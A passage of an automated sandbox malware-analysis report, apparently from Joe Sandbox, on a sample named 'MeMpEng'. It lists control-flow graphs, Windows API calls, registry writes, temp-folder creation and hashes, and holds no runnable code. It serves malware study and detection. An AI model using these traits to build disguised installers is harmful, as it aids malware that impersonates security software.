                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: ... %d%%$STy
                                                          • API String ID: 551687249-2882605797
                                                          • Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                                          • Instruction ID: eb1ee041d621481d77111d3da967b5f6536357fdff7ba477760ccc35d22143eb
                                                          • Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                                          • Instruction Fuzzy Hash: FD515F71910219EBCF11CF65DA8469E7FA8AB00756F14417BE804BA2C1C7789B41CBAA

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 936 402711-40272a call 402da9 939 402730-402737 936->939 940 402c4f-402c52 936->940 941 402739 939->941 942 40273c-40273f 939->942 943 402c58-402c5e 940->943 941->942 944 4028a3-4028ab 942->944 945 402745-402754 call 4064b4 942->945 944->940 945->944 949 40275a 945->949 950 402760-402764 949->950 951 4027f9-4027fc 950->951 952 40276a-402785 ReadFile 950->952 954 402814-402824 call 4060c7 951->954 955 4027fe-402801 951->955 952->944 953 40278b-402790 952->953 953->944 957 402796-4027a4 953->957 954->944 964 402826 954->964 955->954 958 402803-40280e call 406125 955->958 960 4027aa-4027bc MultiByteToWideChar 957->960 961 40285f-40286b call 40649b 957->961 958->944 958->954 960->964 965 4027be-4027c1 960->965 961->943 967 402829-40282c 964->967 968 4027c3-4027ce 965->968 967->961 970 40282e-402833 967->970 968->967 971 4027d0-4027f5 SetFilePointer MultiByteToWideChar 968->971 972 402870-402874 970->972 973 402835-40283a 970->973 971->968 974 4027f7 971->974 976 402891-40289d SetFilePointer 972->976 977 402876-40287a 972->977 973->972 975 40283c-40284f 973->975 974->964 975->944 980 402851-402857 975->980 976->944 978 402882-40288f 977->978 979 40287c-402880 977->979 978->944 979->976 979->978 980->950 981 40285d 980->981 981->944
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                            • Part of subcall function 00406125: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026F6,00000000,00000000,?,00000000,00000011), ref: 0040613B
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: 233c6f879122765c140ec07ecab3eee11d9f6e18c011ef8f82b6bc4890f14a46
                                                          • Instruction ID: 94532b36e9b1b55a0417b46d3f551769048a354c57792839695d4204f468be83
                                                          • Opcode Fuzzy Hash: 233c6f879122765c140ec07ecab3eee11d9f6e18c011ef8f82b6bc4890f14a46
                                                          • Instruction Fuzzy Hash: D6510C75D04119AADF20EFD4CA84AAEBBB9FF44304F14817BE541B62D0D7B89D82CB58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 982 4068d8-4068f8 GetSystemDirectoryW 983 4068fa 982->983 984 4068fc-4068fe 982->984 983->984 985 406900-406909 984->985 986 40690f-406911 984->986 985->986 987 40690b-40690d 985->987 988 406912-406945 wsprintfW LoadLibraryExW 986->988 987->988
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                                          • wsprintfW.USER32 ref: 0040692A
                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040693E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME
                                                          • API String ID: 2200240437-1106614640
                                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                          • Instruction ID: 3d91c3bba12f32b4d8e24f08bfb099957206232b6387f0edcfac50a9fed73821
                                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                          • Instruction Fuzzy Hash: 80F0F671501219ABDB20BB68DD0EF9B376CAB00304F10447AA546F10E0EB789B69CB98

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 989 729f1817-729f1856 call 729f1bff 993 729f185c-729f1860 989->993 994 729f1976-729f1978 989->994 995 729f1869-729f1876 call 729f2480 993->995 996 729f1862-729f1868 call 729f243e 993->996 1001 729f1878-729f187d 995->1001 1002 729f18a6-729f18ad 995->1002 996->995 1005 729f187f-729f1880 1001->1005 1006 729f1898-729f189b 1001->1006 1003 729f18af-729f18cb call 729f2655 call 729f1654 call 729f1312 GlobalFree 1002->1003 1004 729f18cd-729f18d1 1002->1004 1029 729f1925-729f1929 1003->1029 1007 729f191e-729f1924 call 729f2655 1004->1007 1008 729f18d3-729f191c call 729f1666 call 729f2655 1004->1008 1011 729f1888-729f1889 call 729f2b98 1005->1011 1012 729f1882-729f1883 1005->1012 1006->1002 1009 729f189d-729f189e call 729f2e23 1006->1009 1007->1029 1008->1029 1022 729f18a3 1009->1022 1025 729f188e 1011->1025 1017 729f1885-729f1886 1012->1017 1018 729f1890-729f1896 call 729f2810 1012->1018 1017->1002 1017->1011 1028 729f18a5 1018->1028 1022->1028 1025->1022 1028->1002 1032 729f192b-729f1939 call 729f2618 1029->1032 1033 729f1966-729f196d 1029->1033 1039 729f193b-729f193e 1032->1039 1040 729f1951-729f1958 1032->1040 1033->994 1035 729f196f-729f1970 GlobalFree 1033->1035 1035->994 1039->1040 1042 729f1940-729f1948 1039->1042 1040->1033 1041 729f195a-729f1965 call 729f15dd 1040->1041 1041->1033 1042->1040 1044 729f194a-729f194b FreeLibrary 1042->1044 1044->1040
                                                          APIs
                                                            • Part of subcall function 729F1BFF: GlobalFree.KERNEL32(?), ref: 729F1E74
                                                            • Part of subcall function 729F1BFF: GlobalFree.KERNEL32(?), ref: 729F1E79
                                                            • Part of subcall function 729F1BFF: GlobalFree.KERNEL32(?), ref: 729F1E7E
                                                          • GlobalFree.KERNEL32(00000000), ref: 729F18C5
                                                          • FreeLibrary.KERNEL32(?), ref: 729F194B
                                                          • GlobalFree.KERNEL32(00000000), ref: 729F1970
                                                            • Part of subcall function 729F243E: GlobalAlloc.KERNEL32(00000040,?), ref: 729F246F
                                                            • Part of subcall function 729F2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,729F1896,00000000), ref: 729F28E0
                                                            • Part of subcall function 729F1666: wsprintfW.USER32 ref: 729F1694
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.837153397.00000000729F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 729F0000, based on PE: true
                                                          • Associated: 0000000B.00000002.837149162.00000000729F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837157292.00000000729F4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837161148.00000000729F6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_729f0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                          • String ID:
                                                          • API String ID: 3962662361-3916222277
                                                          • Opcode ID: 6a2b590f4eb02cea2a98d6eaa2cb1fba880869a9ac85c9daae2a7dc8d912ed0f
                                                          • Instruction ID: 8875931735a933170e072c6243bb56c4972caa6cc3facec2a5970a68c7fda43c
                                                          • Opcode Fuzzy Hash: 6a2b590f4eb02cea2a98d6eaa2cb1fba880869a9ac85c9daae2a7dc8d912ed0f
                                                          • Instruction Fuzzy Hash: 6241C771804241EBDB819F3CD988BD53BACAF05358F1C6479EE1A9A089DB74C584CBE3

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1046 4024af-4024e0 call 402dcb * 2 call 402e5b 1053 4024e6-4024f0 1046->1053 1054 402c4f-402c5e 1046->1054 1055 4024f2-4024ff call 402dcb lstrlenW 1053->1055 1056 402503-402506 1053->1056 1055->1056 1059 402508-402519 call 402da9 1056->1059 1060 40251a-40251d 1056->1060 1059->1060 1062 40252e-402542 RegSetValueExW 1060->1062 1063 40251f-402529 call 4032d9 1060->1063 1067 402544 1062->1067 1068 402547-402628 RegCloseKey 1062->1068 1063->1062 1067->1068 1068->1054
                                                          APIs
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnB972.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024FA
                                                          • RegSetValueExW.KERNEL32 ref: 0040253A
                                                          • RegCloseKey.KERNEL32(?), ref: 00402622
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsnB972.tmp
                                                          • API String ID: 2655323295-1793845889
                                                          • Opcode ID: 1f98af66c98e622ea097f2737b7b91c500bbd897f6573687ec4a0a2fb9e2066a
                                                          • Instruction ID: b5124b365774ee0dd77fffeda1a995c18ababb59e8a55150708f98195cc7d2d6
                                                          • Opcode Fuzzy Hash: 1f98af66c98e622ea097f2737b7b91c500bbd897f6573687ec4a0a2fb9e2066a
                                                          • Instruction Fuzzy Hash: B8117231D00114BEDB01EFA59E59AAEB6B4EF54358F20443FF504B61D1C7B88E40966C

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1071 406073-40607f 1072 406080-4060b4 GetTickCount GetTempFileNameW 1071->1072 1073 4060c3-4060c5 1072->1073 1074 4060b6-4060b8 1072->1074 1075 4060bd-4060c0 1073->1075 1074->1072 1076 4060ba 1074->1076 1076->1075
                                                          APIs
                                                          • GetTickCount.KERNEL32(7570D4C4,C:\Users\user\AppData\Local\Temp\,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008), ref: 00406091
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040352D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819), ref: 004060AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-4262883142
                                                          • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                          • Instruction ID: 3a9c7f2d553a521e2ba94e631897efa79da28a954d47360b9b57a106d7dab247
                                                          • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                          • Instruction Fuzzy Hash: 83F09076B40204BFEB00CF69ED05F9EB7ACEB95750F11803AED05F7180E6B099548768
                                                          APIs
                                                            • Part of subcall function 00405ECE: CharNextW.USER32(?), ref: 00405EDC
                                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
                                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                            • Part of subcall function 00405AA8: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AEA
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive,?,00000000,000000F0), ref: 00401672
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive, xrefs: 00401665
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Unoffensive
                                                          • API String ID: 1892508949-2785362531
                                                          • Opcode ID: 60c2c0ddde8b7e5a5259822198f5dfbdca4b1fe95804475fb22a6f2f1a41da81
                                                          • Instruction ID: 2b03c7a92312b5a1b0d009ad41e3f6a941738229f321331d68055a18e38198b9
                                                          • Opcode Fuzzy Hash: 60c2c0ddde8b7e5a5259822198f5dfbdca4b1fe95804475fb22a6f2f1a41da81
                                                          • Instruction Fuzzy Hash: 4511D031504514EBCF207FA5CD056AF36A0EF04368B25493FE941B22F1D63D4A81DA5E
                                                          APIs
                                                          • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?,00000800), ref: 00406468
                                                          • RegCloseKey.KERNEL32(?), ref: 00406473
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3356406503-1824292864
                                                          • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                          • Instruction ID: 8bbbfa9f798598a3d1dedb2a9c281e33174829b5b93865dedadbfc74a219c892
                                                          • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                          • Instruction Fuzzy Hash: 9F01B132110209BADF21CF51CD05EDB3BA8EB44360F018039FD1692150D738DA64DBA4
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402128
                                                            • Part of subcall function 004055D9: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                                            • Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll,00000000,0079A700,756F110C,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                                            • Part of subcall function 004055D9: lstrcatW.KERNEL32 ref: 00405634
                                                            • Part of subcall function 004055D9: SetWindowTextW.USER32 ref: 00405646
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                                            • Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                                          • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: 297150e83417b5866f3c74e4a486ab5a4ba485464345ec717dcdc95307e67a96
                                                          • Instruction ID: 73d72cb5994b484f29e4ff80cb350354ef05bb92eb19bb99874f54bc55697afd
                                                          • Opcode Fuzzy Hash: 297150e83417b5866f3c74e4a486ab5a4ba485464345ec717dcdc95307e67a96
                                                          • Instruction Fuzzy Hash: EF21A131904104EACF10AFA5CF89A9E7A71BF54359F30413FF105B91E5DBBD89829A2E
                                                          APIs
                                                          • GlobalFree.KERNEL32(00997840), ref: 00401C30
                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree
                                                          • String ID: Call
                                                          • API String ID: 3394109436-1824292864
                                                          • Opcode ID: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
                                                          • Instruction ID: 6559a21230efabb52023b21709d08c05de394b4458a3aca8e6f4fe2726326e98
